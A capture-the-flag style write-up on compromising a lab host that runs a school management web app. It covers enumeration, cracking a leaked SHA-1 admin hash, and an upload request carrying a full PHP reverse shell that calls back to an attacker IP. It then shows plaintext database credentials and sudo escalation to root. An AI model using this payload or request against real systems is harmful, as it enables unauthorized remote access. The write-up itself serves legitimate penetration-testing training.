Educated

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.155.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 10:58 +08
Nmap scan report for 192.168.155.13
Host is up (0.0088s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Wisdom Elementary School
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.14 seconds

Initial Access

Port 80

There is a website running on port 80.

Directory Enumeration

$ gobuster dir -u http://192.168.155.13 -w /usr/share/wordlists/dirb/big.txt -k -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.155.13
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/assets               (Status: 301) [Size: 317] [--> http://192.168.155.13/assets/]
/management           (Status: 301) [Size: 321] [--> http://192.168.155.13/management/]
/server-status        (Status: 403) [Size: 279]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.155.13/vendor/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

$ dirsearch -u http://192.168.155.13
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                           
                                                                                                                                                                                                                  
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ranay/Desktop/PG/educated/reports/http_192.168.155.13/_24-06-07_12-15-51.txt

Target: http://192.168.155.13/

[12:15:51] Starting:                                                                                                                                                                                              
[12:15:52] 403 -  279B  - /.ht_wsr.txt                                      
[12:15:52] 403 -  279B  - /.htaccess.bak1                                   
[12:15:52] 403 -  279B  - /.htaccess.orig                                   
[12:15:52] 403 -  279B  - /.htaccess.save
[12:15:52] 403 -  279B  - /.htaccess.sample                                 
[12:15:52] 403 -  279B  - /.htaccess_extra                                  
[12:15:52] 403 -  279B  - /.htaccess_orig
[12:15:52] 403 -  279B  - /.htaccessBAK
[12:15:52] 403 -  279B  - /.htaccess_sc                                     
[12:15:52] 403 -  279B  - /.htaccessOLD2                                    
[12:15:52] 403 -  279B  - /.htaccessOLD
[12:15:52] 403 -  279B  - /.htm                                             
[12:15:52] 403 -  279B  - /.html
[12:15:52] 403 -  279B  - /.htpasswds                                       
[12:15:52] 403 -  279B  - /.httr-oauth                                      
[12:15:52] 403 -  279B  - /.htpasswd_test
[12:15:53] 403 -  279B  - /.php                                             
[12:15:58] 301 -  317B  - /assets  ->  http://192.168.155.13/assets/        
[12:15:58] 200 -  476B  - /assets/
[12:16:06] 301 -  321B  - /management  ->  http://192.168.155.13/management/
[12:16:06] 404 -    1KB - /management/configprops
[12:16:06] 404 -    1KB - /management/env                                   
[12:16:06] 200 -    2KB - /management/
[12:16:11] 403 -  279B  - /server-status                                    
[12:16:11] 403 -  279B  - /server-status/                                   
[12:16:16] 200 -  466B  - /vendor/                                          
                                                                             
Task Completed

$ feroxbuster -u http://192.168.155.13 -b 404 -x txt,php,pdf
...
200      GET       36l      221w     1446c http://192.168.155.13/management/installation/install_guide.txt
...
200      GET     1156l     5239w    47297c http://192.168.155.13/management/installation/sql/database.sql
...

After some enumeration, we will notice that there is an installation guide on the website.

When we visit this installation guide, we can see that there are credentials and instruction on how to use the software.

Thanks for having interest in our open source software
Follow the steps below for the installation:

STEPS 1: LOCAL SERVER INSTALLATION
1. Go to phpMyadmin (Wamp or xamp or ....)
2. Create a database and import the database.sql file found in sql folder
3. Go to software folder - application - config folder and open database.php with dreamweaver or sublime text or notepad++ or any text editor software you have
4. Supply your database information and save
5. Test software and enjoy

STEPS 2: LIVE SERVER INSTALLATION
1. Login to your cpanel (Nginx or Apache)
2. Create database via your mysql wizard or any
3. Go to public_html and upload software zip file
3. Go to software folder - application - config folder and open database.php with your server editor
4. Supply your database information and save
5. Test software and enjoy

NB: If you are using software as a subdomain like school.servername.com you may experience eror 404 not found,
    dont be scared, it is your .htaccess issue, you will need to configure it, if you dont know how to
    do that, you can message us or send message to your hosting service provider.

Login Details: Change Admin After Login & Delete other users
..............................................................
Admin: admin@admin.com
Pass: 1234

Student: student@student.com
Pass: 1234

Teacher: teacher@teacher.com
Pass: 1234

Parent: parent@parent.com
Pass: 1234

However, none of these credential works. From the enumeration, there is also a database.sql file. Maybe those will contain the credentials that we need.

After looking inside the folder, we can se there are 2 admins

DROP TABLE IF EXISTS `admin`;
CREATE TABLE IF NOT EXISTS `admin` (
  `admin_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` longtext COLLATE utf8_unicode_ci NOT NULL,
  `email` longtext COLLATE utf8_unicode_ci NOT NULL,
  `phone` longtext COLLATE utf8_unicode_ci NOT NULL,
  `password` longtext COLLATE utf8_unicode_ci NOT NULL,
  `level` longtext COLLATE utf8_unicode_ci NOT NULL,
  `login_status` longtext COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`admin_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `admin`
--

INSERT INTO `admin` (`admin_id`, `name`, `email`, `phone`, `password`, `level`, `login_status`) VALUES
(1, 'Administrator', 'admin@admin.com', '07133445656', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220', '1', '0'),
(9, 'Udemy Instructor', 'udemy@udemy.com', '+1564783934', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220', '2', '0');

The passwords for these account look like hash. So we will checking using this

Hash AnalyzerTunnelsUP

We can see the hash is a SHA-1 hash.

We will then try to crack the hash for those 2 users. However, the result only returned for admin@admin.com which is 1234

$ john --wordlist=/usr/share/wordlists/rockyou.txt creds
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
1234             (admin@admin.com)     
1g 0:00:00:00 DONE (2024-06-07 12:38) 100.0g/s 108000p/s 108000c/s 108000C/s mihaela..brownie
Warning: passwords printed above might not be all those cracked
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.

Free School Management Software Exploit

After some searching online, there is an exploit that might work with this

Free School Management Software 1.0 - Remote Code Execution (RCE)Exploit Database

After playing around with the request, this is the request is able to send the paylaod over.

POST /management/admin/examQuestion/create HTTP/1.1

Host: 192.168.155.13

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)

Content-Type: multipart/form-data; boundary=---------------------------183813756938980137172117669544

Connection: close

Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q

Upgrade-Insecure-Requests: 1

Content-Length: 10775



-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="name"



test4

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="class_id"



2

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="subject_id"



5

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="timestamp"



2021-12-08

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="teacher_id"



1

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="file_type"



txt

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="status"



1

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="description"



123123

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="_wysihtml5_mode"



1

-----------------------------183813756938980137172117669544

Content-Disposition: form-data; name="file_name"; filename="cmd2.php"

Content-Type: application/octet-stream



<?php

// Copyright (c) 2020 Ivan Sincek

// v2.3

// Requires PHP v5.0.0 or greater.

// Works on Linux OS, macOS, and Windows OS.

// See the original script at https://github.com/pentestmonkey/php-reverse-shell.

class Shell {

    private $addr  = null;

    private $port  = null;

    private $os    = null;

    private $shell = null;

    private $descriptorspec = array(

        0 => array('pipe', 'r'), // shell can read from STDIN

        1 => array('pipe', 'w'), // shell can write to STDOUT

        2 => array('pipe', 'w')  // shell can write to STDERR

    );

    private $buffer  = 1024;    // read/write buffer size

    private $clen    = 0;       // command length

    private $error   = false;   // stream read/write error

    public function __construct($addr, $port) {

        $this->addr = $addr;

        $this->port = $port;

    }

    private function detect() {

        $detected = true;

        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS

            $this->os    = 'LINUX';

            $this->shell = '/bin/bash';

        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {

            $this->os    = 'WINDOWS';

            $this->shell = 'cmd.exe';

        } else {

            $detected = false;

            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";

        }

        return $detected;

    }

    private function daemonize() {

        $exit = false;

        if (!function_exists('pcntl_fork')) {

            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";

        } else if (($pid = @pcntl_fork()) < 0) {

            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";

        } else if ($pid > 0) {

            $exit = true;

            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";

        } else if (posix_setsid() < 0) {

            // once daemonized you will actually no longer see the script's dump

            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";

        } else {

            echo "DAEMONIZE: Completed successfully!\n";

        }

        return $exit;

    }

    private function settings() {

        @error_reporting(0);

        @set_time_limit(0); // do not impose the script execution time limit

        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories

    }

    private function dump($data) {

        $data = str_replace('<', '&lt;', $data);

        $data = str_replace('>', '&gt;', $data);

        echo $data;

    }

    private function read($stream, $name, $buffer) {

        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream

            $this->error = true;                            // set global error flag

            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";

        }

        return $data;

    }

    private function write($stream, $name, $data) {

        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream

            $this->error = true;                            // set global error flag

            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";

        }

        return $bytes;

    }

    // read/write method for non-blocking streams

    private function rw($input, $output, $iname, $oname) {

        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {

            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length

            $this->dump($data); // script's dump

        }

    }

    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)

    // we must read the exact byte length from a stream and not a single byte more

    private function brw($input, $output, $iname, $oname) {

        $fstat = fstat($input);

        $size = $fstat['size'];

        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {

            // for some reason Windows OS pipes STDIN into STDOUT

            // we do not like that

            // we need to discard the data from the stream

            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {

                $this->clen -= $bytes;

                $size -= $bytes;

            }

        }

        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {

            $size -= $bytes;

            $this->dump($data); // script's dump

        }

    }

    public function run() {

        if ($this->detect() && !$this->daemonize()) {

            $this->settings();



            // ----- SOCKET BEGIN -----

            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);

            if (!$socket) {

                echo "SOC_ERROR: {$errno}: {$errstr}\n";

            } else {

                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS



                // ----- SHELL BEGIN -----

                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);

                if (!$process) {

                    echo "PROC_ERROR: Cannot start the shell\n";

                } else {

                    foreach ($pipes as $pipe) {

                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS

                    }



                    // ----- WORK BEGIN -----

                    $status = proc_get_status($process);

                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");

                    do {

						$status = proc_get_status($process);

                        if (feof($socket)) { // check for end-of-file on SOCKET

                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;

                        } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running

                            echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams

                        }                                                                    // use proc_get_status() instead

                        $streams = array(

                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR

                            'write'  => null,

                            'except' => null

                        );

                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS

                        if ($num_changed_streams === false) {

                            echo "STRM_ERROR: stream_select() failed\n"; break;

                        } else if ($num_changed_streams > 0) {

                            if ($this->os === 'LINUX') {

                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN

                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET

                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET

                            } else if ($this->os === 'WINDOWS') {

                                // order is important

                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN

                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET

                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET

                            }

                        }

                    } while (!$this->error);

                    // ------ WORK END ------



                    foreach ($pipes as $pipe) {

                        fclose($pipe);

                    }

                    proc_close($process);

                }

                // ------ SHELL END ------



                fclose($socket);

            }

            // ------ SOCKET END ------



        }

    }

}

echo '<pre>';

// change the host address and/or port number as necessary

$sh = new Shell('192.168.45.206', 4444);

$sh->run();

unset($sh);

// garbage collector requires PHP v5.3.0 or greater

// @gc_collect_cycles();

echo '</pre>';

?>

-----------------------------183813756938980137172117669544--

Next we will just visit the website to trigger the payload and get the reverse shell.

Lateral Movement

Password in SQL config

After some enumeration, there is a file that contains the database connection credentials

www-data@school:/var/www/html/management/application/config$ cat database.php
...

$active_group = 'default';
$query_builder = TRUE;

$db['default'] = array(
        'dsn' => '',
        'hostname' => 'localhost',
        'username' => 'school',
        'password' => '@jCma4s8ZM<?kA',
        'database' => 'school_mgment',
        'dbdriver' => 'mysqli',
        'dbprefix' => '',
        'pconnect' => FALSE,
        'db_debug' => TRUE,
        'cache_on' => FALSE,
        'cachedir' => '',
        'char_set' => 'utf8',
        'dbcollat' => 'utf8_general_ci',
        'swap_pre' => '',
        'encrypt' => FALSE,
        'compress' => FALSE,
        'stricton' => FALSE,
        'failover' => array(),
        'save_queries' => TRUE,
);

After which we will login as school to the database.

www-data@school:/var/www/html/management/application/config$ mysql -u school -p 
<l/management/application/config$ mysql -u school -p         
Enter password: @jCma4s8ZM<?kA

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 61
Server version: 8.0.32-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

The user in the system might be a teacher. So we will enumerate that table first.

mysql> use school_mgment;
use school_mgment;
No connection. Trying to reconnect...
Connection id:    64
Current database: *** NONE ***

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_school_mgment |
+-------------------------+
| academic_syllabus       |
| activity                |
| admin                   |
| admin_role              |
| assignment              |
| attendance              |
| bank                    |
| book                    |
| book_category           |
| ci_sessions             |
| circular                |
| class                   |
| club                    |
| department              |
| designation             |
| dormitory               |
| enquiry                 |
| enquiry_category        |
| exam                    |
| exam_question           |
| expense_category        |
| hostel_category         |
| hostel_room             |
| house                   |
| invoice                 |
| language                |
| language_list           |
| leave                   |
| mark                    |
| material                |
| noticeboard             |
| parent                  |
| payment                 |
| section                 |
| settings                |
| sms_settings            |
| social_category         |
| student                 |
| student_category        |
| subject                 |
| teacher                 |
| transport               |
| transport_route         |
| vehicle                 |
+-------------------------+
44 rows in set (0.00 sec)

mysql> select * from teacher
select * from teacher
    -> ;
;
+------------+-----------------+------+----------------+------------+------+--------------+-------------+------------------------------------------------------------------------------------------+------------+--------------------------+----------+---------+------------+----------+---------------+----------------+-------------+------------------------------------------+---------------+----------------+-----------------+----------------+--------+-----------------+---------+--------------+
| teacher_id | name            | role | teacher_number | birthday   | sex  | religion     | blood_group | address                                                                                  | phone      | email                    | facebook | twitter | googleplus | linkedin | qualification | marital_status | file_name   | password                                 | department_id | designation_id | date_of_joining | joining_salary | status | date_of_leaving | bank_id | login_status |
+------------+-----------------+------+----------------+------------+------+--------------+-------------+------------------------------------------------------------------------------------------+------------+--------------------------+----------+---------+------------+----------+---------------+----------------+-------------+------------------------------------------+---------------+----------------+-----------------+----------------+--------+-----------------+---------+--------------+
|          1 | Testing Teacher | 1    | f82e5cc        | 2018-08-19 | male | Christianity | B+          | 546787, Kertz shopping complext, Silicon Valley, United State of America, New York city. | +912345667 | michael_sander@school.pg | facebook | twitter | googleplus | linkedin | PhD           | Married        | profile.png | 3db12170ff3e811db10a76eadd9e9986e3c1a5b7 |             2 |              4 | 2019-09-15      | 5000           |      1 | 2019-09-18      |       3 | 0            |
+------------+-----------------+------+----------------+------------+------+--------------+-------------+------------------------------------------------------------------------------------------+------------+--------------------------+----------+---------+------------+----------+---------------+----------------+-------------+------------------------------------------+---------------+----------------+-----------------+----------------+--------+-----------------+---------+--------------+
1 row in set (0.00 sec)

mysql>

We can see that this user have a password which is most probably SHA-1 also. We can use john to crack the hash.

We can also see that there are 2 users in the home folder.

We can then login using SSH to get the shell and flag.

$ ssh msander@192.168.155.13                       
The authenticity of host '192.168.155.13 (192.168.155.13)' can't be established.
ED25519 key fingerprint is SHA256:VnMMoSlX8Y0MsU947B2bAEqDX+KmnqpFLFXtLgsOERw.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:68: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.155.13' (ED25519) to the list of known hosts.
msander@192.168.155.13's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-146-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 07 Jun 2024 05:47:24 AM UTC

  System load:  1.0               Processes:               235
  Usage of /:   59.8% of 9.75GB   Users logged in:         0
  Memory usage: 49%               IPv4 address for ens160: 192.168.155.13
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

msander@school:~$

Privilege Escalation

APK on emiller's home folder

There is an apk on emiller's home folder.

msander@school:/home/emiller/development$ ls
grade-app.apk

First we will download to our own kali machine so that we can do analysis on it.

$ scp msander@192.168.155.13:/home/emiller/development/grade-app.apk ./grade-app.apk
msander@192.168.155.13's password: 
grade-app.apk

Next, we will use MobSF to conduct analysis on the APK to see if there is any information that is hidden inside

GitHub - MobSF/Mobile-Security-Framework-MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.GitHub

We will run the docker for it.

$ sudo docker pull opensecurity/mobile-security-framework-mobsf:latest
sudo docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

After running MobSF, it maybe contains the password.

We can try to use the password to see if we can login as emiller.

Sudo -l

When we use sudo, we can see that the user can run anything.

emiller@school:~/development$ sudo -l
[sudo] password for emiller: 
Sorry, try again.
[sudo] password for emiller: 
Matching Defaults entries for emiller on school:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User emiller may run the following commands on school:
    (ALL : ALL) ALL

So we just need to sudo su - to change ourselves into root.

emiller@school:~/development$ sudo su -
root@school:~#

PreviousCodo NextExtplorer

Last updated 1 year ago

hashtagInitial Access

hashtagPort 80

hashtagDirectory Enumeration

hashtagFree School Management Software Exploit

hashtagLateral Movement

hashtagPassword in SQL config

hashtagPrivilege Escalation

hashtagAPK on emiller's home folder

hashtagSudo -l